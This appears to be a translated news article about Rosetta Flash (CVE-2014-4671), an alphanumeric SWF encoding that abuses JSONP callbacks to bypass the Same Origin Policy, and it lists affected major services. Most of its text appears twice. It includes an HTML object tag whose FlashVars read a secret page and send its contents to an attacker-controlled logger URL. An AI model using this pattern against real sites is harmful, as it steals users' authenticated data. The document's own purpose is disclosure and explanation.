Rosetta Flash - SWF encoding for calling from JSONP
Michele Spagnuolo , a Google security specialist, wrote a utility that can encode any SWF file with any dictionary.
Why do you need it? Everything is very simple - such a file can be passed as a callback parameter in JSONP on the site from which you need to get information, so you can bypass the Same Origin Policy.
This problem was known for a long time, however, it was not given special attention because it was extremely difficult to get a SWF file consisting only of characters that can be set as a callback parameter, however, now such a tool has appeared.
The utility uses zlib, a Huffman algorithm and ADLER32 brute force checksum.
From large services, were vulnerable:
Suppose there are two domains: miki.net controlled by us and the one you want to attack trovatel.net
On trovatel.net there is a JSONP script that takes a parameter from printable characters:
')
There is a secret page that gives out a secret, if you enter it from a cookie.
When entering the miki.it/RosettaFlash page, the user is waiting for this code:
Where miki.it/RosettaFlash/log.php is a logger script.
The user's browser will download the SWF file as if from the site trovatel.net, open the page with the secret (and with the correct cookie, of course) and send its contents to the remote server of the attacker. Everything is pretty simple and typical.
At the moment, Adobe has released an update of Flash Player, in which the exploitation of this vulnerability is impossible.
Information in the author's blog
More information in PDF
Utility on Github
CVE-2014-4671
Why do you need it? Everything is very simple - such a file can be passed as a callback parameter in JSONP on the site from which you need to get information, so you can bypass the Same Origin Policy.
This problem was known for a long time, however, it was not given special attention because it was extremely difficult to get a SWF file consisting only of characters that can be set as a callback parameter, however, now such a tool has appeared.
The utility uses zlib, a Huffman algorithm and ADLER32 brute force checksum.
From large services, were vulnerable:
- Google services (accounts.google.com, books.google.com, maps.google.com)
- Youtube
- Ebay
- Tumblr
- Olark
How was the vulnerability exploited?
Suppose there are two domains: miki.net controlled by us and the one you want to attack trovatel.net
On trovatel.net there is a JSONP script that takes a parameter from printable characters:
http://trovatel.net/vulnerable_jsonp.php?callback= ')
There is a secret page that gives out a secret, if you enter it from a cookie.
http://trovatel.net/secret/secret.php When entering the miki.it/RosettaFlash page, the user is waiting for this code:
<object type="application/x-shockwave-flash" data="http://trovatel.net/vulnerable_jsonp.php?callback=CWSMI…" width="1" height="1"> <param name="FlashVars" value="url=http://trovatel.net/secret/secret.php&exfiltrate=http://miki.it/RosettaFlash/log.php"> </object> Where miki.it/RosettaFlash/log.php is a logger script.
The user's browser will download the SWF file as if from the site trovatel.net, open the page with the secret (and with the correct cookie, of course) and send its contents to the remote server of the attacker. Everything is pretty simple and typical.
At the moment, Adobe has released an update of Flash Player, in which the exploitation of this vulnerability is impossible.
Links
Information in the author's blog
More information in PDF
Utility on Github
CVE-2014-4671
Source: https://habr.com/ru/post/229639/
All Articles